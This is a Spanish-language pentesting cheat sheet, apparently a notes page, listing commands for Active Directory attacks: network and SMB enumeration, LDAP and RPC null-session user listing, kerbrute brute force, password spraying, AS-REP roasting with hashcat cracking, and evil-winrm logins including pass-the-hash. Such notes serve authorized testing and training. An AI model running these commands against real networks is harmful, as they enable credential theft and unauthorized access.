🔷Enumeración Básica
Enumeración de Active Directory para obtener un acceso inicial
Mapping Network
Host Discovery
fping -agp <ip-range>nmap -sn <ip-range>Port Scanning
nmap -sS -p- -T3 -iL hosts.txt -oN full-nmap.txtnmap -p <ports> -sCV -iL hosts.txtNetwork Enumeration - SMB
Listing SMB Shares
smbclient -L //<ip> -Nsmbmap -H <ip>nmap -p 445 --script smb-enum-shares <ip>Accessing SMB Shares
smbclient //<ip>/<share-name> -Nsmbclient //<ip>/<share-name> --user=<username> --password=<pass> -W <domain>Domain Enumeration
LDAP Enumeration
ldapsearch -x -H ldap://<ip> -s base
# Da bastante ouput si está habilitadoldapsearch -x -H ldap://<ip> -b "<dc=name,dc=name...>" "(objectClass=person)"nxc ldap <ip> -u "uwu" -p "" --usersEnum4linux-ng
enum4linux-ng -A <ip>RPC Enumeration via Null Session
rpcclient -U "" <ip> -N # verificar acceso RPC con null session
> enumdomusers # enumerar usuarios y RID
> help # lista comandos disponiblesfor i in $(seq 500 2000); do echo "queryuser $i" |rpcclient -U "" -N <ip> 2>/dev/null | grep -i "User Name"; doneUsername Enumeration with Kerbrute
./kerbrute userenum --dc <ip> -d <domain-name> users.txt
# users.txt = lista de potenciales usuarios recogidos con rpcclient/enum4linux-ngKerbrute Password Bruteforce
kerbrute bruteuser --dc <ip> -d <domain> passes.txt <username>Password Spraying
Password Policy Check
rpcclient
rpcclient -U "" <ip> -N
> getdompwinfocrackmapexec
crackmapexec smb <ip> --pass-polPassword Spraying Attack with CrackMapExec
crackmapexec smb <ip> -u users.txt -p passwords.txtAS-REP Roasting
Enumeración - UF_DONT_REQUIRE_PREAUTH
UF_DONT_REQUIRE_PREAUTHimpacket-GetNPUsers <domain-name>/ -dc-ip <ip> -usersfile users.txt -format hashcat -outputfile hashes.txt -no-passExplotación
hashcat -m 18200 hashes.txt /usr/share/wordlists/rockyou.txtSesión Windows Remota
netexec winrm <computer>.<domain> -u <username> -p '<password>'evil-winrm -i <ip> -u <username> -p '<password>'evil-winrm -i <ip> -u <username> -H '<hash>'Última actualización
